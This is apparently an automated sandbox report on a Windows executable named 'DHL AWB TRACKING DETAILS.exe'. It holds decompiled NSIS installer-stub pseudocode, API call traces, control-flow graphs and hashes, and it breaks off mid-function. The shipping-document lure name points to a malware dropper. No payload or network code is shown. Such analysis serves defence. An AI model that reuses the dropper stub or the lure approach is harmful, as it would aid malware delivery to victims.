                    • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                    • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405D7C(CHAR* _a4) {
                    				void* _t2;
                    
                    				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                    				if(_t2 == 0xffffffff) {
                    					return 0;
                    				}
                    				FindClose(_t2);
                    				return 0x4224e8;
                    			}





                    APIs
                    • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405D87
                    • FindClose.KERNEL32(00000000), ref: 00405D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID: $B
                    • API String ID: 2295610775-2366330246
                    • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                    • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                    • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                    • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405DA3(signed int _a4) {
                    				struct HINSTANCE__* _t5;
                    				CHAR* _t7;
                    				signed int _t9;
                    
                    				_t9 = _a4 << 3;
                    				_t7 =  *(_t9 + 0x409218);
                    				_t5 = GetModuleHandleA(_t7);
                    				if(_t5 != 0) {
                    					L2:
                    					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                    				}
                    				_t5 = LoadLibraryA(_t7); // executed
                    				if(_t5 != 0) {
                    					goto L2;
                    				}
                    				return _t5;
                    			}







                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: AddressHandleLibraryLoadModuleProc
                    • String ID:
                    • API String ID: 310444273-0
                    • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                    • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                    • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                    • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 149 4037d3-4037d6 138->149 150 4037db-4037e6 call 403897 138->150 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 153 4036dc-4036e6 GetFileAttributesA 147->153 149->144 161 403864-40386c call 404ef5 150->161 162 4037e8-403805 ShowWindow LoadLibraryA 150->162 156 4036e8-4036ea 153->156 157 4036ec-4036ed call 4055bf 153->157 156->146 156->157 157->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->149 174 40387a-403881 call 40140b 171->174 174->149
                    C-Code - Quality: 96%
                    			E004035E3() {
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t20;
                    				signed int _t24;
                    				void* _t28;
                    				void* _t30;
                    				int _t31;
                    				void* _t34;
                    				struct HINSTANCE__* _t37;
                    				int _t38;
                    				intOrPtr _t39;
                    				int _t42;
                    				intOrPtr _t59;
                    				char _t61;
                    				CHAR* _t63;
                    				signed char _t67;
                    				struct HINSTANCE__* _t75;
                    				CHAR* _t78;
                    				intOrPtr _t80;
                    				CHAR* _t85;
                    
                    				_t80 =  *0x423eb0; // 0x50f930
                    				_t20 = E00405DA3(6);
                    				_t87 = _t20;
                    				if(_t20 == 0) {
                    					_t78 = 0x420498;
                    					"1033" = 0x7830;
                    					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                    					__eflags =  *0x420498;
                    					if(__eflags == 0) {
                    						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                    					}
                    					lstrcatA("1033", _t78);
                    				} else {
                    					E004059E3("1033",  *_t20() & 0x0000ffff);
                    				}
                    				E00403897(_t75, _t87);
                    				_t24 =  *0x423eb8; // 0x80
                    				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
                    				 *0x423f20 = _t24 & 0x00000020;
                    				if(E00405659(_t87, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                    					L16:
                    					if(E00405659(_t95, _t84) == 0) {
                    						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                    					}
                    					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                    					 *0x423688 = _t28;
                    					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                    						L21:
                    						if(E0040140B(0) == 0) {
                    							_t30 = E00403897(_t75, __eflags);
                    							__eflags =  *0x423f40; // 0x0
                    							if(__eflags != 0) {
                    								_t31 = E00404EF5(_t30, 0);
                    								__eflags = _t31;
                    								if(_t31 == 0) {
                    									E0040140B(1);
                    									goto L33;
                    								}
                    								__eflags =  *0x42366c; // 0x0
                    								if(__eflags == 0) {
                    									E0040140B(2);
                    								}
                    								goto L22;
                    							}
                    							ShowWindow( *0x420470, 5);
                    							_t37 = LoadLibraryA("RichEd20");
                    							__eflags = _t37;
                    							if(_t37 == 0) {
                    								LoadLibraryA("RichEd32");
                    							}
                    							_t85 = "RichEdit20A";
                    							_t38 = GetClassInfoA(0, _t85, 0x423640);
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								GetClassInfoA(0, "RichEdit", 0x423640);
                    								 *0x423664 = _t85;
                    								RegisterClassA(0x423640);
                    							}
                    							_t39 =  *0x423680; // 0x0
                    							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                    							E0040140B(5);
                    							return _t42;
                    						}
                    						L22:
                    						_t34 = 2;
                    						return _t34;
                    					} else {
                    						_t75 =  *0x423ea0; // 0x400000
                    						 *0x423654 = _t28;
                    						_v20 = 0x624e5f;
                    						 *0x423644 = E00401000;
                    						 *0x423650 = _t75;
                    						 *0x423664 =  &_v20;
                    						if(RegisterClassA(0x423640) == 0) {
                    							L33:
                    							__eflags = 0;
                    							return 0;
                    						}
                    						_t12 =  &_v16; // 0x624e5f
                    						SystemParametersInfoA(0x30, 0, _t12, 0);
                    						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                    						goto L21;
                    					}
                    				} else {
                    					_t75 =  *(_t80 + 0x48);
                    					if(_t75 == 0) {
                    						goto L16;
                    					}
                    					_t59 =  *0x423ed8; // 0x514f2c
                    					_t78 = 0x422e40;
                    					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
                    					_t61 =  *0x422e40; // 0x67
                    					if(_t61 == 0) {
                    						goto L16;
                    					}
                    					if(_t61 == 0x22) {
                    						_t78 = 0x422e41;
                    						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                    					}
                    					_t63 = lstrlenA(_t78) + _t78 - 4;
                    					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                    						L15:
                    						E00405A85(_t84, E00405578(_t78));
                    						goto L16;
                    					} else {
                    						_t67 = GetFileAttributesA(_t78);
                    						if(_t67 == 0xffffffff) {
                    							L14:
                    							E004055BF(_t78);
                    							goto L15;
                    						}
                    						_t95 = _t67 & 0x00000010;
                    						if((_t67 & 0x00000010) != 0) {
                    							goto L15;
                    						}
                    						goto L14;
                    					}
                    				}
                    			}






























                    APIs
                      • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                    • lstrlenA.KERNEL32(gdsanv,?,?,?,gdsanv,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ), ref: 004036BF
                    • lstrcmpiA.KERNEL32(?,.exe,gdsanv,?,?,?,gdsanv,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                    • GetFileAttributesA.KERNEL32(gdsanv), ref: 004036DD
                    • LoadImageA.USER32 ref: 00403726
                      • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                    • RegisterClassA.USER32 ref: 0040376D
                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                    • CreateWindowExA.USER32 ref: 004037BE
                    • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                    • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                    • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                    • GetClassInfoA.USER32 ref: 0040381C
                    • GetClassInfoA.USER32 ref: 00403829
                    • RegisterClassA.USER32 ref: 00403832
                    • DialogBoxParamA.USER32 ref: 00403851
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $,OQ$.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$gdsanv
                    • API String ID: 914957316-3502106825
                    • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                    • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                    • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                    • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 196 402eb2-402eb7 189->196 197 402de7-402dea 189->197 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 198 402d0f-402d11 192->198 196->182 199 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 197->199 200 402dec-402dfd call 4031da call 4031a8 197->200 201 402d17-402d1d 198->201 202 402e6e-402e76 call 402bc5 198->202 227 402e64-402e69 199->227 228 402e78-402ea8 call 4031da call 402f01 199->228 220 402e02-402e04 200->220 205 402d9d-402da1 201->205 206 402d1f-402d37 call 40571d 201->206 202->196 209 402da3-402da9 call 402bc5 205->209 210 402daa-402db0 205->210 206->210 224 402d39-402d40 206->224 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->196 225 402e0a-402e10 220->225 224->210 229 402d42-402d49 224->229 225->196 225->199 227->182 237 402ead-402eb0 228->237 229->210 231 402d4b-402d52 229->231 231->210 233 402d54-402d5b 231->233 233->210 235 402d5d-402d7d 233->235 235->196 236 402d83-402d87 235->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->196 240 402eb9-402eca 237->240 238->189 238->239 239->210 241 402d99-402d9b 239->241 242 402ed2-402ed7 240->242 243 402ecc 240->243 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                    C-Code - Quality: 96%
                    			E00402C5B(void* __eflags, signed int _a4) {
                    				long _v8;
                    				long _v12;
                    				intOrPtr _v16;
                    				long _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				char _v300;
                    				signed int _t54;
                    				void* _t57;
                    				void* _t62;
                    				signed int _t63;
                    				intOrPtr _t65;
                    				void* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr _t71;
                    				signed int _t77;
                    				signed int _t79;
                    				signed int _t82;
                    				signed int _t83;
                    				signed int _t89;
                    				intOrPtr _t92;
                    				signed int _t101;
                    				signed int _t103;
                    				void* _t105;
                    				signed int _t106;
                    				signed int _t109;
                    				void* _t110;
                    
                    				_v8 = 0;
                    				_v12 = 0;
                    				 *0x423eac = GetTickCount() + 0x3e8;
                    				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe", 0x400);
                    				_t105 = E0040575C("C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe", 0x80000000, 3);
                    				 *0x409010 = _t105;
                    				if(_t105 == 0xffffffff) {
                    					return "Error launching installer";
                    				}
                    				E00405A85("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe");
                    				E00405A85(0x42b000, E004055BF("C:\\Users\\engineer\\Desktop"));
                    				_t54 = GetFileSize(_t105, 0);
                    				__eflags = _t54;
                    				 *0x41f048 = _t54;
                    				_t109 = _t54;
                    				if(_t54 <= 0) {
                    					L22:
                    					E00402BC5(1);
                    					__eflags =  *0x423eb4; // 0x7e00
                    					if(__eflags == 0) {
                    						goto L30;
                    					}
                    					__eflags = _v12;
                    					if(_v12 == 0) {
                    						L26:
                    						_t57 = GlobalAlloc(0x40, _v20); // executed
                    						_t110 = _t57;
                    						E00405E7D(0x40afb0);
                    						E0040578B( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
                    						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                    						__eflags = _t62 - 0xffffffff;
                    						 *0x409014 = _t62;
                    						if(_t62 != 0xffffffff) {
                    							_t63 =  *0x423eb4; // 0x7e00
                    							_t65 = E004031DA(_t63 + 0x1c);
                    							 *0x41f04c = _t65;
                    							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                    							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                    							__eflags = _t68 - _v20;
                    							if(_t68 == _v20) {
                    								__eflags = _v40 & 0x00000001;
                    								 *0x423eb0 = _t110;
                    								 *0x423eb8 =  *_t110;
                    								if((_v40 & 0x00000001) != 0) {
                    									 *0x423ebc =  *0x423ebc + 1;
                    									__eflags =  *0x423ebc;
                    								}
                    								_t45 = _t110 + 0x44; // 0x44
                    								_t70 = _t45;
                    								_t101 = 8;
                    								do {
                    									_t70 = _t70 - 8;
                    									 *_t70 =  *_t70 + _t110;
                    									_t101 = _t101 - 1;
                    									__eflags = _t101;
                    								} while (_t101 != 0);
                    								_t71 =  *0x41703c; // 0x41a9c
                    								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                    								E0040571D(0x423ec0, _t110 + 4, 0x40);
                    								__eflags = 0;
                    								return 0;
                    							}
                    							goto L30;
                    						}
                    						return "Error writing temporary file. Make sure your temp folder is valid.";
                    					}
                    					E004031DA( *0x417038);
                    					_t77 = E004031A8( &_a4, 4); // executed
                    					__eflags = _t77;
                    					if(_t77 == 0) {
                    						goto L30;
                    					}
                    					__eflags = _v8 - _a4;
                    					if(_v8 != _a4) {
                    						goto L30;
                    					}
                    					goto L26;
                    				} else {
                    					do {
                    						_t79 =  *0x423eb4; // 0x7e00
                    						_t106 = _t109;
                    						asm("sbb eax, eax");
                    						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
                    						__eflags = _t109 - _t82;
                    						if(_t109 >= _t82) {
                    							_t106 = _t82;
                    						}
                    						_t83 = E004031A8(0x417048, _t106); // executed
                    						__eflags = _t83;
                    						if(_t83 == 0) {
                    							E00402BC5(1);
                    							L30:
                    							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                    						}
                    						__eflags =  *0x423eb4; // 0x7e00
                    						if(__eflags != 0) {
                    							__eflags = _a4 & 0x00000002;
                    							if((_a4 & 0x00000002) == 0) {
                    								E00402BC5(0);
                    							}
                    							goto L19;
                    						}
                    						E0040571D( &_v40, 0x417048, 0x1c);
                    						_t89 = _v40;
                    						__eflags = _t89 & 0xfffffff0;
                    						if((_t89 & 0xfffffff0) != 0) {
                    							goto L19;
                    						}
                    						__eflags = _v36 - 0xdeadbeef;
                    						if(_v36 != 0xdeadbeef) {
                    							goto L19;
                    						}
                    						__eflags = _v24 - 0x74736e49;
                    						if(_v24 != 0x74736e49) {
                    							goto L19;
                    						}
                    						__eflags = _v28 - 0x74666f73;
                    						if(_v28 != 0x74666f73) {
                    							goto L19;
                    						}
                    						__eflags = _v32 - 0x6c6c754e;
                    						if(_v32 != 0x6c6c754e) {
                    							goto L19;
                    						}
                    						_a4 = _a4 | _t89;
                    						_t103 =  *0x417038; // 0x0
                    						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                    						_t92 = _v16;
                    						__eflags = _t92 - _t109;
                    						 *0x423eb4 = _t103;
                    						if(_t92 > _t109) {
                    							goto L30;
                    						}
                    						__eflags = _a4 & 0x00000008;
                    						if((_a4 & 0x00000008) != 0) {
                    							L15:
                    							_v12 = _v12 + 1;
                    							_t109 = _t92 - 4;
                    							__eflags = _t106 - _t109;
                    							if(_t106 > _t109) {
                    								_t106 = _t109;
                    							}
                    							goto L19;
                    						}
                    						__eflags = _a4 & 0x00000004;
                    						if((_a4 & 0x00000004) != 0) {
                    							goto L22;
                    						}
                    						goto L15;
                    						L19:
                    						__eflags = _t109 -  *0x41f048; // 0x4081
                    						if(__eflags < 0) {
                    							_v8 = E00405E0F(_v8, 0x417048, _t106);
                    						}
                    						 *0x417038 =  *0x417038 + _t106;
                    						_t109 = _t109 - _t106;
                    						__eflags = _t109;
                    					} while (_t109 > 0);
                    					goto L22;
                    				}
                    			}


































                    APIs
                    • GetTickCount.KERNEL32 ref: 00402C6F
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,00000400), ref: 00402C8B
                      • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 00405760
                      • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                    • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 00402CD4
                    • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                    Strings
                    • Error launching installer, xrefs: 00402CAB
                    • "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" , xrefs: 00402C68
                    • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                    • soft, xrefs: 00402D4B
                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                    • Null, xrefs: 00402D54
                    • Inst, xrefs: 00402D42
                    • C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                    • API String ID: 2803837635-553060449
                    • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                    • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                    • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                    • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 329 401778-40177e call 405ce3 322->329 323->329 333 401783-401787 329->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 381 401830-401831 347->381 358 40184e-401854 348->358 362 402886 358->362 360->361 364 40189c-4018a7 FindCloseChangeNotification 360->364 361->364 365 402888-40288c 362->365 367 40287d-402880 364->367 368 4018ad-4018b0 364->368 367->362 369 4018b2-4018c3 call 405aa7 lstrcatA 368->369 370 4018c5-4018c8 call 405aa7 368->370 376 4018cd-402205 call 405346 369->376 370->376 376->365 384 40264e-402655 376->384 381->358 382 401833-401834 381->382 382->348 384->367
                    C-Code - Quality: 75%
                    			E00401734(FILETIME* __ebx, void* __eflags) {
                    				void* _t33;
                    				void* _t41;
                    				void* _t43;
                    				FILETIME* _t49;
                    				FILETIME* _t62;
                    				void* _t64;
                    				signed int _t70;
                    				FILETIME* _t71;
                    				FILETIME* _t75;
                    				signed int _t77;
                    				void* _t80;
                    				CHAR* _t82;
                    				void* _t85;
                    
                    				_t75 = __ebx;
                    				_t82 = E004029E8(0x31);
                    				 *(_t85 - 8) = _t82;
                    				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                    				_t33 = E004055E5(_t82);
                    				_push(_t82);
                    				if(_t33 == 0) {
                    					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                    				} else {
                    					_push(0x409b68);
                    					E00405A85();
                    				}
                    				E00405CE3(0x409b68);
                    				while(1) {
                    					__eflags =  *(_t85 + 8) - 3;
                    					if( *(_t85 + 8) >= 3) {
                    						_t64 = E00405D7C(0x409b68);
                    						_t77 = 0;
                    						__eflags = _t64 - _t75;
                    						if(_t64 != _t75) {
                    							_t71 = _t64 + 0x14;
                    							__eflags = _t71;
                    							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                    						}
                    						asm("sbb eax, eax");
                    						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                    						__eflags = _t70;
                    						 *(_t85 + 8) = _t70;
                    					}
                    					__eflags =  *(_t85 + 8) - _t75;
                    					if( *(_t85 + 8) == _t75) {
                    						E0040573D(0x409b68);
                    					}
                    					__eflags =  *(_t85 + 8) - 1;
                    					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                    					__eflags = _t41 - 0xffffffff;
                    					 *(_t85 - 0x34) = _t41;
